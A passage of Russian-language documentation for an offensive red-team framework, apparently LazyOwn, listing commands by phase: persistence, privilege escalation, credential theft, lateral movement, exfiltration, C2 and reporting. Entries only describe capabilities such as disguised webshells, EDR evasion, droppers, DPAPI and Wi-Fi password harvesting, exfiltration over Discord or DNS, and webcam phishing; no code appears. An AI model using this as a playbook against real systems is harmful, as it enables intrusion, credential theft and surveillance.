Фаза: persist | Источник: cli/commands/persist_migrated.py Сгенерировать C2-профиль beacon с изменением трафика и подменой домена (domain fronting).

conptyshell

Фаза: persist | Источник: cli/commands/persist.py

Загружает ConPtyShell и подготавливает команду запуска PowerShell.

createrevshell

Фаза: persist | Источник: cli/commands/persist.py

Создаёт bash-скрипт reverse shell в папке sessions/.

createwebshell

Фаза: persist | Источник: cli/commands/persist.py

Создаёт веб-шеллы (PHP под видом JPG, p0wny-shell, ASP).

createwinrevshell

Фаза: persist | Источник: cli/commands/persist.py

Создаёт Windows reverse shell (PowerShell).

darkarmour

Фаза: persist | Источник: cli/commands/persist_migrated.py

Использует инструмент darkarmour для генерации необнаруживаемой версии PE-исполняемого файла.

dr0p1t

Фаза: persist | Источник: cli/commands/persist_migrated.py

Запускает инструмент Dr0p1t для создания скрытого дроппера вредоносного ПО.

ftp

Фаза: persist | Источник: cli/commands/persist_migrated.py

Подключается к FTP-хосту, используя учётные данные из файла и указанный порт.

generate_revshell

Фаза: persist | Источник: cli//commands/persist_migrated.py

Генерирует reverse shell на различных языках программирования.

grisun0

Фаза: persist | Источник: cli/commands/persist_migrated.py

Создаёт и копирует команду shell для добавления нового пользователя, назначения пароля, добавления пользователя в группу sudo и переключения на этого пользователя.

grisun0w

Фаза: persist | Источник: cli/commands/persist_migrated.py

Создаёт и копирует команду PowerShell для добавления нового пользователя, назначения пароля, добавления пользователя в группу «Администраторы» и переключения на этого пользователя.

ivy

Фаза: persist | Источник: cli/commands/persist_migrated.py

Генерирует полезные нагрузки с помощью Ivy с различными параметрами. Ivy — это фреймворк для создания полезных нагрузок для выполнения произвольного исходного кода VBA (макросов) непосредственно в памяти. Загрузчик Ivy делает это, используя программный доступ в среде объектов VBA для загрузки, расшифровки и выполнения шеллкода.

knokknok

Фаза: persist | Источник: cli/commands/persist_migrated.py

Отправляет специальную строку для запуска reverse shell с командой 'c2 client_name'.

listener_go

Фаза: persist | Источник: cli/commands/persist_migrated.py

Настраивает и запускает слушатель для указанной жертвы.

listener_py

Фаза: persist | Источник: cli/commands/persist_migrated.py

Настраивает и запускает слушатель для указанной жертвы.

msfpc

Фаза: persist | Источник: cli/commands/persist_migrated.py

Генерирует полезные нагрузки с помощью MSFvenom Payload Creator (MSFPC).

paranoid_meterpreter

Фаза: persist | Источник: `cli/commands/persist_migrated.py

Создаёт и разпливает параноидальную полезную нагрузку Meterpreter и слушатель с закреплением SSL/TLS и отслеживанием UUID.

pwncat

Фаза: persist | Источник: cli/commands/persist_migrated.py

Запускает pwncat с указанным портом для прослушивания. SELFINJECT

pwncatcs

Фаза: persist | Источник: cli/commands/persist.py

Запускает слушатель reverse shell pwncat-cs.

rdp

Фаза: persist | Источник: cli/commands/persist_migrated.py

Читает учётные данные из файла, шифрует пароль и выполняет команду подключения к RDP.

revwin

Фаза: persist | Источник: cli/commands/persist.py

Создаёт исполняемый файл Windows reverse shell.

scarecrow

Фаза: persist | Источник: cli/commands/persist_migrated.py

Выполняет ScareCrow с различными параметрами для обхода EDR-решений и выполнения шеллкода.

service

Фаза: persist | Источник: cli/commands/persist_migrated.py

Создаёт файл службы systemd для указанного бинарного файла и генерирует скрипт для включения и запуска службы.

setoolKits

Фаза: persist | Источник: cli/commands/persist_migrated.py

Выполняет рабочий процесс SEToolKit для генерации полезной нагрузки Meterpreter.

toctoc

Фаза: persist | Источник: cli/commands/persist_migrated.py

Отправляет магический пакет китайскому вредоносному ПО.

veil

Фаза: persist | Источник: cli/commands/persist_migrated.py

Генерирует полезные нагрузки с помощью Veil-Evasion с различными параметрами.. Veil-Evasion — это ферймворк для создания полезных нагрузок.

weevely

Фаза: persist | Источник: cli/commands/persist_migrated.py

Подключается к PHP-бэкдору с помощью Weevely, защищённому указанным паролем.

weevelygen

Фаза: persist | Источник: cli/commands/persist_migrated.py

Сгенерировать PHP-бэкдор с помощью Weevely, защищенный указанным паролем.

wmi_lateral

Фаза: persist | Источник: cli/commands/persist.py

Выполнить команду на удаленном хосте через WMI.

wmi_persist

Фаза: persist | Источник: cli/commands/persist.py

Создать подписку на событие WMI для сохранения доступа (без файлов, без записи на диск).

wmi_scheduled_task

Фаза: persist | Источник: cli/commands/persist.py

Создать запланированное задание для сохранения доступа через WMI.

06. Повышение привилегий

crystal_ball

Фаза: privesc | Источник: cli/commands/crystal_ball.py

Анализировать вывод linpeas/winpeas и ранжировать векторы повышения привилегий с точными командами.

gtfo

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Найти бинарный файл в базах знаний GTFOBins и LOLBas (parquet).

juicypotato

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Раздавать JuicyPotato по HTTP для повышения привилегий в Windows.

les

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Запустить Linux Exploit Suggester для версии ядра.

linpeas

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Раздавать linpeas.sh по HTTP и вывести однострочную команду для целевой системы.

printspoofer

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Раздавать PrintSpoofer по HTTP для повышения привилегий в Windows.

privesc_cmd_by_os

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Подготовить и отправить команду linpeas/winpeas клиенту C2.

privesc_suggest

Фаза: privesc | Источник: cli/commands/crystal_ball.py

Быстрый псевдоним для crystal_ball --auto.

pspy

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Раздавать монитор процессов pspy по HTTP.

responder

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Запустить Responder на настроенном device с повышенными привилегиями.

smbserver

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Поднять SMB-сервер Impacket с тремя вариантами ретрансляции.

sudo

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Перезапустить фреймворк с root-привилегиями, если они отсутствуют.

sudo_privesc

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Проанализировать вывод sudo -l и сверить с GTFOBins.

suid_check

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Вывести команды для перечисления SUID/SGID, готовые для вставки на целевой системе.

whoami_priv

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Вывести команды для перечисления привилегий для целевой ОС.

winpeas

Фаза: privesc | Источник: cli/commands/privilege_escalation.py

Раздавать вариант winPEAS по HTTP и вывести однострочную команду для целевой системы.

07. Доступ к учетным данным

addusers

Фаза: cred | Источник: cli/commands/cred_migrated.py

Открывает или создает файл users.txt в каталоге sessions для редактирования с помощью nano.

adsso_spray

Фаза: cred | Источник: cli/commands/cred_migrated.py

Выполняет атаку перебором паролей (password spray) на Azure Active Directory Seamless Single Sign-On (SSO) с использованием заданного списка пользователей.

cewl

Фаза: cred | Источник: cli/commands/cred.py

Сгенерировать словарь из веб-сайта с помощью cewl.

crack_cisco_7_password

Фаза: cred | Источник: cli/commands/cred_migrated.py

Взломать хэш пароля Cisco Type 7 и отобразить открытый текст.

createcredentials

Фаза: cred | Источник: cli/commands/cred_migrated.py

Создает файл credentials.txt в каталоге sessions с указанными именем пользователя и паролем.

createhash

Фаза: cred | Источник: cli/commands/cred_migrated.py

Создает файл hash.txt в каталоге sessions с указанным значением хэша и анализирует его с помощью Name-the-hash.

createmail

Фаза: cred | Источник: cli/commands/cred_migrated.py

Сгенерировать перестановки email на основе полного имени и self.params['domain'], затем сохранить их в файл.

createusers_and_hashs

Фаза: cred | Источник: cli/commands/cred_migrated.py

Команда createusers_and_hashs: Извлекает имена пользователей и хэши из файла дампа.

cred

Фаза: cred | Источник: cli/commands/cred_migrated.py Отобразить учетные данные, хранящиеся в файле credentials.txt, и скопировать пароль в буфер обмена.

creds_py

Фаза: cred | Источник: cli/commands/cred.py

Извлечь учетные данные из файла или вывода команды.

crunch

Фаза: cred | Источник: cli/commands/cred.py

Сгенерировать словари с помощью crunch.

cubespraying

Фаза: cred | Источник: cli/commands/cred_migrated.py

Команда cubespraying: автоматизирует установку и использование CubeSpraying для выполнения атак с распылением учетных данных.

dacledit

Фаза: cred | Источник: cli/commands/cred_migrated.py

Выполнить команду dacledit.py для конкретного пользователя или всех пользователей, перечисленных в файле users.txt.

generatedic

Фаза: cred | Источник: cli/commands/cred_migrated.py

Генерирует словарь на основе имени цели и списка символов с различными комбинациями.

hashcat

Фаза: cred | Источник: cli/commands/cred.py

Запустить взлом паролей с помощью hashcat.

hydra

Фаза: cred | Источник: cli/commands/cred.py

Запустить Hydra для онлайн-атак на пароли.

john2hash

Фаза: cred | Источник: cli/commands/cred.py

Преобразовать хеш в формат John the Ripper.

john2keepas

Фаза: cred | Источник: cli/commands/cred_migrated.py

Перечислить все файлы .kdbx в каталоге 'sessions', позволить пользователю выбрать один и запустить

john2zip

Фаза: cred | Источник: cli/commands/cred_migrated.py

Перечислить все файлы .zip в каталоге 'sessions', позволить пользователю выбрать один и запустить команду

keepass

Фаза: cred | Источник: cli/commands/cred_migrated.py

Открыть файл .kdbx и вывести заголовки и содержимое всех записей. Пароль может быть предоставлен через

medusa

Фаза: cred | Источник: cli/commands/cred.py

Запустить Medusa для онлайн-атак на пароли.

passtightvnc

Фаза: cred | Источник: cli/commands/cred_migrated.py

Расшифровывает пароли TightVNC с помощью Metasploit.

passwordspray

Фаза: cred | Источник: cli/commands/cred_migrated.py

Выполнить распыление паролей с помощью crackmapexec с заданными параметрами.

refill_password

Фаза: cred | Источник: cli/commands/cred_migrated.py

Сгенерировать список возможных паролей, заполняя каждую звездочку во входных данных символами, указанными пользователем.

rocky

Фаза: cred | Источник: cli/commands/cred_migrated.py

Уменьшает словарь на основе заданной длины пароля.

searchhash

Фаза: cred | Источник: cli/commands/cred_migrated.py

Помогает найти типы хешей в Hashcat, просматривая его вывод справки.

smalldic

Фаза: cred | Источник: cli/commands/cred_migrated.py

Обрабатывает создание временных файлов для пользователей и паролей на основе небольшого словаря.

spraykatz

Фаза: cred | Источник: cli/commands/cred.py

Запустить SprayKatz для распыления учетных данных.

sshkey

Фаза: cred | Источник: cli/commands/cred.py

Сгенерировать пару ключей SSH.

transform

Фаза: cred | Источник: cli/commands/cred_migrated.py

Преобразует входную строку в соответствии с заданным пользователем стилем регистра.

username_anarchy

Фаза: cred | Источник: cli/commands/cred_migrated.py

Сгенерировать имена пользователей с помощью инструмента username-anarchy на основе ввода пользователя.

08. Боковое перемещение

addcli

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Добавить клиента для выполнения команд c2

bitm

Фаза: lateral | Источник: cli/commands/bitm.py

Менеджер атак типа «браузер посередине».

bloodyAD

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполнить команду bloodyAD.py для конкретного пользователя или всех пользователей, перечисленных в файле users.txt.

chisel

Фаза: lateral | Источник: cli/commands/lateral.py

Запустить chisel для быстрого туннелирования.

dcomexec

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполняет инструмент Impacket dcomexec для запуска команд на удаленной системе с помощью DCOM.

dominion

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполнить полностью автоматический захват домена Active Directory.

getTGT

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Запрашивает билет предоставления билетов (TGT) с помощью инструмента Impacket с предоставленными учетными данными.

gospherus

Фаза: lateral | Источник: cli/commands/lateral_migrated.py Command gospherus: Клонирует и использует инструмент Gopherus для генерации gopher-полезных нагрузок для различных сервисов.

id_rsa

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Создаёт файл закрытого SSH-ключа и подключается к удалённому хосту по SSH.

lateral_mov_lin

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполняет латеральное перемещение, загружая и устанавливая LazyOwn на удалённой Linux-машине.

ligolo

Фаза: lateral | Источник: cli/commands/lateral.py

Запускает Ligolo-ng для продвинутого пивотинга.

mssqlcli

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Пытается подключиться к серверу MSSQL с помощью инструмента mssqlclient.py с аутентификацией Windows.

nc

Фаза: lateral | Источник: cli/commands/lateral.py

Прослушивание или подключение через Netcat.

ngrok

Фаза: lateral | Источник: cli/commands/lateral.py

Запускает туннель ngrok.

penelope

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Команда penelope: Устанавливает и запускает Penelope для работы с reverse и bind shell.

regeorg

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполняет инструмент reGeorg для туннелирования HTTP(s) через SOCKS-прокси.

rnc

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Запускает nc с rlwrap на указанном порту для прослушивания.

set_proxychains

Фаза: lateral | Источник: cli/commands/lateral.py

Настраивает proxychains для текущей сессии.

shadowsocks

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполняет инструмент Shadowsocks для создания защищённого туннеля для сетевого трафика.

socat

Фаза: lateral | Источник: cli/commands/lateral.py

Запускает socat для перенаправления портов.

ssh

Фаза: lateral | Источник: cli/commands/lateral.py

SSH-подключение к удалённому хосту (нестандартный порт).

sshd

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Запускает SSH-сервис и отображает его статус.

stormbreaker

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Команда stormbreaker: Автоматизирует установку и использование Storm-Breaker для выполнения различных сетевых атак.

targetedKerberoas

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполняет инструмент targetedKerberoast для извлечения сервисных билетов Kerberos.

tord

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполняет скрипт tor.sh с указанным портом или по умолчанию использует порт 80, если порт не указан.

upload_c2

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Команда upload в клиенте с использованием C2 для загрузки файла.

vpn

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Подключается к VPN, выбирая из доступных .ovpn файлов.

wifipass

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Эта функция генерирует PowerShell-скрипт, который извлекает сохранённые пароли Wi-Fi в системе Windows.

wmiexec

Фаза: lateral | Источник: cli/commands/lateral.py

Выполняет команды через WMI.

wmiexecpro

Фаза: lateral | Источник: cli/commands/lateral_migrated.py

Выполняет wmiexec-pro с различными опциями для операций WMI.

09. Экфильтрация данных

adgetpass

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Генерирует PowerShell-скрипт для извлечения учётных данных Azure AD Connect.

decrypt

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Расшифровывает XOR-зашифрованный файл с использованием соответствующего ключа.

dns_beacon

Фаза: экфильтрация | Источник: cli/commands/dns_exfil.py

Запускает DNS-туннельный beacon (маяк).

dns_beacon_status

Фаза: экфильтрация | Источник: cli/commands/dns_exfil.py

Показывает статус всех DNS-маяков.

dns_exfil_listen

Фаза: экфильтрация | Источник: cli/commands/dns_exfil.py

Запускает DNS-экфильтрационный слушатель на UDP-порту 53.

download_c2

Фаза: экфильтрация | Источник: cli/commands/exfiltration.py

Загружает файл из C2-импланта через команду upload.

dpapi_blob

Фаза: экфильтрация | Источник: cli/commands/dpapi.py

Расшифровывает DPAPI-blob в автономном режиме.

dpapi_harvest

Фаза: экфильтрация | Источник: cli/commands/dpapi.py

Собирает все защищённые DPAPI учётные данные с локальной машины.

dpapi_masterkeys

Фаза: экфильтрация | Источник: cli/commands/dpapi.py

Перечисляет и извлекает мастер-ключи DPAPI.

dploot

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите dploot для извлечения секретов, защищённых DPAPI.

encrypt

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Зашифруйте файл с помощью XOR, используя ключ, предоставленный вызывающей стороной.

evidence

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Закодируйте дерево sessions/ в видеофайл или декодируйте обратно.

evilwinrm

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Управляйте Evil-WinRM с аутентификацией по паролю, хэшу или только Kerberos.

exfil_auto

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Автоматически определяйте флаги и конфиденциальные файлы, затем выполняйте эксфильтрацию.

exfil_discord

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Эксфильтрируйте файл через вебхук Discord.

exfil_dns

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Эксфильтрируйте данные через DNS-туннелирование.

exfil_gcs

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Загрузите файл в Google Cloud Storage.

exfil_http

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Эксфильтрируйте файл через HTTP POST на контролируемый сервер.

exfil_s3

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Загрузите файл в корзину AWS S3.

exfil_start_server

Фаза: эксфильтрация | Источник: cli/commands/dns_exfil.py

Запустите все необходимые прослушиватели для эксфильтрации.

exfil_telegram

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Эксфильтрируйте файл через Telegram Bot API.

getadusers

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите impacket-GetADUsers для перечисления учётных записей AD на контроллере домена.

getnthash_py

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Восстановите NT-хэш из Kerberos U2U TGS с помощью PKINITtools.

getuserspns

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите impacket-GetUserSPNs для запроса сервисных билетов, пригодных для roasting.

gitdumper

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Установите git-dumper, если он отсутствует, и загрузите удалённое дерево .git.

gmsadumper

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите gMSADumper для чтения блобов паролей gMSA, видимых текущему пользователю.

http_exfil_server

Фаза: эксфильтрация | Источник: cli/commands/dns_exfil.py

Запустите минимальный HTTP-приёмник для эксфильтрации.

reg_py

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запросите удалённый реестр с помощью impacket-reg.py при аутентификации по хэшу.

rsync

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Отправьте дерево sessions/ на rhost по SCP с помощью sshpass.

samdump2

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите samdump2 для файлов sessions/SYSTEM и sessions/SAM.

secretsdump

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Запустите impacket-secretsdump для SAM, учётных данных или полезных нагрузок NTDS.

smb_exfil

Фаза: эксфильтрация | Источник: cli/commands/dns_exfil.py

Эксфильтрируйте файлы в SMB-ресурс на машине атакующего.

stage

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Подготовьте данные для эксфильтрации: сжатие, шифрование и разделение.

unzip

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Извлеките zip-архив, расположенный в sessions/.

upload_gofile

Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py

Загрузите файл из sessions/ на Gofile через его HTTP API.

10. Управление и контроль

apt_playbook

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Список, проверка и запуск плейбуков APT на основе публичных отчётов об угрозах.

atomic_agent

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Генерация и синхронизация скриптов атомарных агентов.

atomic_gen

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Генерация тестовых скриптов и скриптов очистки для заданного идентификатора техники Atomic Red Team.

atomic_tests

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Выполнение тестов Atomic Red Team на основе выбранной пользователем платформы и теста.

attack_plan

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py

Выполнение многошагового плана симуляции APT на основе идентификаторов тестов Atomic Red Team.

automsf

Фаза: C2 | Источник: cli/commands/command_and_control_migrated.py Попробуйте проверить уязвимость, используя модуль, переданный в качестве аргумента lazyown, например automsf exploit/windows/iis/iis_webdav_upload_asp для использования в Metasploit.

c2

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Управление настройкой C2-сервера и компиляцией агента.

c2_beacon_cmd

Фаза: c2 | Источник: cli/commands/command_and_control.py

Поставить команду в очередь для выполнения на подключенном маяке (beacon).

c2_beacons

Фаза: c2 | Источник: cli/commands/command_and_control.py

Список всех активных сессий маяков с отметками времени последнего появления.

c2_implant

Фаза: c2 | Источник: cli/commands/command_and_control.py

Создание скомпилированной полезной нагрузки импланта для целевой платформы.

c2_keygen

Фаза: c2 | Источник: cli/commands/command_and_control.py

Генерация нового ключа AES-256 для шифрования маяка.

c2_quickstart

Фаза: c2 | Источник: cli/commands/command_and_control.py

Быстрая настройка C2: генерация ключа, подготовка каталога импланта, вывод команд маяка.

c2_status

Фаза: c2 | Источник: cli/commands/command_and_control.py

Показать сводный статус C2: прослушиватели, маяки, импланты и сессии.

caldera

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Устанавливает и запускает сервер Caldera.

caldera_export

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Экспорт плейбука LazyOwn в YAML-формат способностей CALDERA.

caldera_import

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Импорт способностей CALDERA в плейбуки LazyOwn.

duckyspark

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

duckyspark Компилирует и загружает .ino скетч на устройство Digispark с помощью Arduino CLI и Micronucleus.

emp3r0r

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Команда emp3r0r Загружает и настраивает сервер Emperor для локальной эксплуатации.

empire

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Генерирует полезные нагрузки с помощью PowerShell Empire с различными опциями.

generate_playbook

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Генерирует плейбук, который интегрирует тесты Atomic Red Team и техники MITRE ATT&CK.

iis_webdav_upload_asp

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

(CVE-2017-7269). Уязвим при использовании модуля iis_webdav_upload_asp из Metasploit.

listener

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Управление прослушивателями C2: список, добавление, запуск, остановка, удаление.

mitre_test

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Взаимодействие с фреймворком MITRE ATT&CK с использованием формата STIX 2.0.

msf

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Автоматизирует различные задачи Metasploit, включая сканирование уязвимостей, настройку обратных оболочек и создание полезных нагрузок.

msfrpc

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Подключается к демону msfrpcd и позволяет удаленно управлять Metasploit.

my_playbook

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Генерирует плейбук из вашей пользовательской базы техник.

sandbox

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Переключение или запрос режима песочницы Docker.

sliver_server

Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py

Запускает сервер Sliver и генерирует файл конфигурации клиента для подключающихся клиентов.

11. Отчетность

apropos

Фаза: отчет | Источник: cli/commands/report_migrated.py

Поиск команд, соответствующих заданному параметру, в интерфейсе cmd и при необходимости расширение поиска с помощью системной команды apropos.

banners

Фаза: отчет | Источник: cli/commands/report.py

Управление пользовательскими баннерами для фреймворка.

c2asm

Фаза: отчет | Источник: cli/commands/report_migrated.py

Отображение кода C и ASM рядом в интерфейсе на основе curses.

camphish

Фаза: отчет | Источник: cli/commands/report_migrated.py

Выполняет инструмент camphish для получения снимков с фронтальной камеры телефона цели или веб-камеры ПК, просто отправив ссылку.

create_session_json

Фаза: отчет | Источник: cli/commands/report.py

Создать JSON сессии. Создать файл JSON-отчёта сессии.

createjsonmachine

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Создать новый файл JSON-нагрузки на основе шаблона, предоставленного в payload.json.

createjsonmachine_batch

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Создать несколько файлов JSON-нагрузки на основе входного CSV-файла из HackerOne.

createtargets

Фаза: отчёт | Источник: cli/commands/report.py

Создать файл целей из результатов сканирования nmap.

download_malwarebazar

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Загрузить образец вредоносного ПО из MalwareBazaar, используя его SHA256-хэш.

extract_ports

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Извлечь информацию об открытых портах и IP-адресах из указанного файла.

eyewitness

Фаза: отчёт | Источник: cli/commands/report.py

Запустить EyeWitness для захвата скриншотов веб-страниц.

eyewitness_py

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Автоматизирует установку и выполнение EyeWitness без необходимости ввода данных пользователем.

gen_report

Фаза: отчёт | Источник: cli/commands/report_enhanced.py

Создать улучшенные профессиональные отчёты по результатам тестирования на проникновение.

get_avaible_actions

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Получить список поддерживаемых действий.

gowitness

Фаза: отчёт | Источник: cli/commands/report.py

Запустить gowitness для захвата скриншотов веб-страниц.

gpt

Фаза: отчёт | Источник: cli/commands/report.py

Запросить GPT/Groq AI для анализа и составления отчётов.

img2vid

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Создаёт MP4-видео из PNG-изображений, найденных в каталоге sessions/captured_images.

lazyreport

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Создать профессиональный отчёт red team на основе данных сессии.

malwarebazar

Фаза: отчёт | Источник: cli/commands/report.py

Поиск образцов вредоносного ПО в Malware Bazaar.

morse

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Интерактивный преобразователь кода Морзе.

name_the_hash

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Определить тип хэша с помощью nth после получения его через get_hash().

nmapscripthelp

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Предоставляет помощь в поиске и отображении информации о скриптах Nmap.

process_scans

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Обрабатывает CSV-файлы с результатами сканирования и данными об уязвимостях для создания JSON-базы данных в стиле Shodan.

pth_net

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Выполняет инструмент Pass-the-Hash (PTH) Net для смены пароля учётной записи Active Directory.

pup

Фаза: отчёт | Источник: cli/commands/report_migrated.py

Обрабатывает HTML-содержимое указанного URL с помощью утилиты pup и селектора CSS по умолчанию.

vulns

Фаза: отчёт | Источник: cli/commands/report.py

Отобразить или управлять уязвимостями.

12. Разное

EOF

Фаза: разное | Источник: cli/commands/misc_migrated.py

Обработка условия конца файла (EOF).

acknowledgearp

Фаза: разное | Источник: cli/commands/misc_migrated.py

Настраивает систему на подтверждение ARP-запросов путём установки параметра ядра.

acknowledgeicmp

Фаза: разное | Источник: cli/commands/misc_migrated.py

Настраивает систему на ответ на ICMP-эхо-запросы путём установки параметра ядра.

addalias

Фаза: разное | Источник: cli/commands/misc_migrated.py

Добавить новый алиас с поддержкой плейсхолдеров, таких как {rhost}, {lhost}, {lport} и т.д.

addhosts

Фаза: разное | Источник: cli/commands/misc_migrated.py

Добавляет запись в файл /etc/hosts, сопоставляя IP-адрес с доменным именем.

aliass

Фаза: разное | Источник: cli/commands/misc_migrated.py

Выводит все настроенные алиасы и связанные с ними команды.

assign

Фаза: разное | Источник: cli/commands/misc_migrated.py

Присвоить значение параметра, сохранить в payload.json и обновить алиасы.

back

Фаза: разное | Источник: cli/commands/module_manager.py

Покинуть контекст текущего модуля.

banner

Фаза: разное | Источник: cli/commands/misc_migrated.py

Показать баннер

base64decode

Фаза: misc | Источник: cli/commands/misc_migrated.py

Декодирует строку в кодировке Base64.

base64encode

Фаза: misc | Источник: cli/commands/misc_migrated.py

Кодирует заданную строку в формат Base64.

browse

Фаза: misc | Источник: cli/commands/misc_migrated.py

Открывает TUI-браузер сессий (sessions/).

campaign

Фаза: misc | Источник: cli/commands/campaign.py

Экспортирует или импортирует всю кампанию как переносимый пакет.

catalog

Фаза: misc | Источник: cli/commands/catalog.py

Просмотр каталога команд.

chainmode

Фаза: misc | Источник: cli/commands/misc_migrated.py

Переключает интерактивное объединение цепочек атак (kill-chain) после каждой команды.

check_update

Фаза: misc | Источник: cli/commands/misc_migrated.py

Проверяет наличие обновлений, сравнивая локальную версию с удалённой.

clean

Фаза: misc | Источник: cli/commands/misc_migrated.py

Удаляет файлы и каталоги в директории sessions, исключая указанные файлы и каталоги.

clock

Фаза: misc | Источник: cli/commands/misc_migrated.py

Отображает текущую дату и время, а также выполняет пользовательский shell-скрипт.

clone_site

Фаза: misc | Источник: cli/commands/misc_migrated.py

Клонирует веб-сайт и обслуживает файлы в sessions/{url_cloned}.

collab_join

Фаза: misc | Источник: cli/commands/misc_migrated.py

Выводит URL для совместной работы нескольких операторов и SSE-эндпоинт.

config_banner

Фаза: misc | Источник: cli/commands/misc_migrated.py

Открывает мастер в стиле Powerlevel10k для переключения сегментов приглашения.

cred_mark_failed

Фаза: misc | Источник: cli/commands/automation.py

Помечает учётные данные как неудачные для конкретного хоста.

cred_reuse

Фаза: misc | Источник: cli/commands/automation.py

Анализирует перехваченные учётные данные и предлагает цели для распыления (spray).

cron

Фаза: misc | Источник: cli/commands/misc_migrated.py

Планирует выполнение команды в указанное время.

ctx

Фаза: misc | Источник: cli/commands/misc_migrated.py

Выводит однострочный контекст оператора: rhost, lhost, domain, phase, os, creds.

daemon_approve

Фаза: misc | Источник: cli/commands/misc_migrated.py

Одобряет или отклоняет текущее ожидающее действие демона.

daemon_focus

Фаза: misc | Источник: cli/commands/misc_migrated.py

Ограничивает автономного демона набором целевых объектов фокусировки.

daemon_mode

Фаза: misc | Источник: cli/commands/misc_migrated.py

Переключает автономного демона между режимами auto, approval и paused.

daemon_pause

Фаза: misc | Источник: cli/commands/misc_migrated.py

Приостанавливает автономного демона перед следующим шагом.

daemon_resume

Фаза: misc | Источник: cli/commands/misc_migrated.py

Возобновляет работу автономного демона (переключает режим на auto).

daemon_veto

Фаза: misc | Источник: cli/commands/misc_migrated.py

Добавляет или очищает запрещённые первые токены команд для автономного демона.

dashboard

Фаза: misc | Источник: cli/commands/misc_migrated.py

Запускает полноэкранную панель оператора LazyOwn (Textual TUI).

db_creds

